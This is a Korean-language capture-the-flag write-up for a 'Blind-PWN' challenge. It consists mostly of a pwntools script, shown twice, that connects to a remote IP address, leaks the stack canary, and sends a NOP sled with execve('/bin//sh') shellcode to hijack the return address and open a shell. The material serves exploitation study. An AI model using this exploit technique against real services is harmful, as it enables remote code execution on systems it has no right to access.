Blind-PWN | Notion

Untitled

버퍼 주소, RBP, Canary 주소까지 모두 알려준다.

이후 입력 부분이 buffer에 들어가는 걸 확인할 수 있다.

위 정보들을 활용하여

from pwn import *

p = remote("43.200.163.250", 31339)

context.log_level = "debug"
context.arch = "amd64"

def slog(name, addr): return success("{}: {}".format(name, hex(addr)))

#you can break me in 3min.
#buffer addr: 0x7ffdfba3e010
#rbp: 0x7ffdfba3e0a0
#canary addr: 0x7ffdfba3e098

p.recvuntil("buffer addr: ")
buffer_addr = int(p.recvline()[:-1], 16)

p.recvuntil("rbp: ")
rbp_addr = int(p.recvline()[:-1], 16)

p.recvuntil("canary addr: ")
canary_addr = int(p.recvline()[:-1], 16)

p.recvuntil("input: ")
shellcode =b"\\x48\\x31\\xf6\\x56\\x48\\xbf\\x2f\\x62\\x69\\x6e\\x2f\\x2f\\x73\\x68\\x57\\x54\\x5f\\x6a\\x3b\\x58\\x99\\x0f\\x05"

Canary_Address, Buffer_Address, RBP_Address

입력을 받아 해당 주소를 받는다.

위 정보들을 총합하여 Nop-Sled 공격기법을 활용하여 RIP주소를 조작하면 된다.

from pwn import *

p = remote("43.200.163.250", 31339)

context.log_level = "debug"
context.arch = "amd64"

def slog(name, addr): return success("{}: {}".format(name, hex(addr)))

#you can break me in 3min.
#buffer addr: 0x7ffdfba3e010
#rbp: 0x7ffdfba3e0a0
#canary addr: 0x7ffdfba3e098

p.recvuntil("buffer addr: ")
buffer_addr = int(p.recvline()[:-1], 16)

p.recvuntil("rbp: ")
rbp_addr = int(p.recvline()[:-1], 16)

p.recvuntil("canary addr: ")
canary_addr = int(p.recvline()[:-1], 16)

p.recvuntil("input: ")
shellcode =b"\\x48\\x31\\xf6\\x56\\x48\\xbf\\x2f\\x62\\x69\\x6e\\x2f\\x2f\\x73\\x68\\x57\\x54\\x5f\\x6a\\x3b\\x58\\x99\\x0f\\x05"

#Buffet2Canary Offset
offset = rbp_addr-buffer_addr
slog("offset : buffer <=> rbp", offset)

#LEAK_CANARY

leak_canary = b'A'*0x89

p.send(leak_canary)
p.recvuntil(leak_canary)
canary = u64(b'\\x00'+p.recv(7))

print()
print("*"*30 + " Address " + "*"*30)
print()

slog("buffer_addr", buffer_addr)
slog("rbp_addr", rbp_addr)
slog("canary_addr", canary_addr)

print()
print("*"*30 + " Offset " + "*"*30)
print()

slog("rbp <=> buffer", rbp_addr-buffer_addr)
slog("Buffer <=> canary", canary_addr-buffer_addr)
slog("rbp <=> canary", rbp_addr-canary_addr)

print()
print("*"*30 + " Stack " + "*"*30)
print()

slog("canary", canary)

p.recvuntil("input: ")

#FINAL_PEXPLOIT

way = 0x88-len(shellcode)
print(hex(way))

payload = b'\\x90'*(0x88-len(shellcode))
payload += shellcode
payload += p64(canary)
payload += b'\\x90'*8
payload += p64(buffer_addr)

p.send(payload)
p.interactive()

Untitled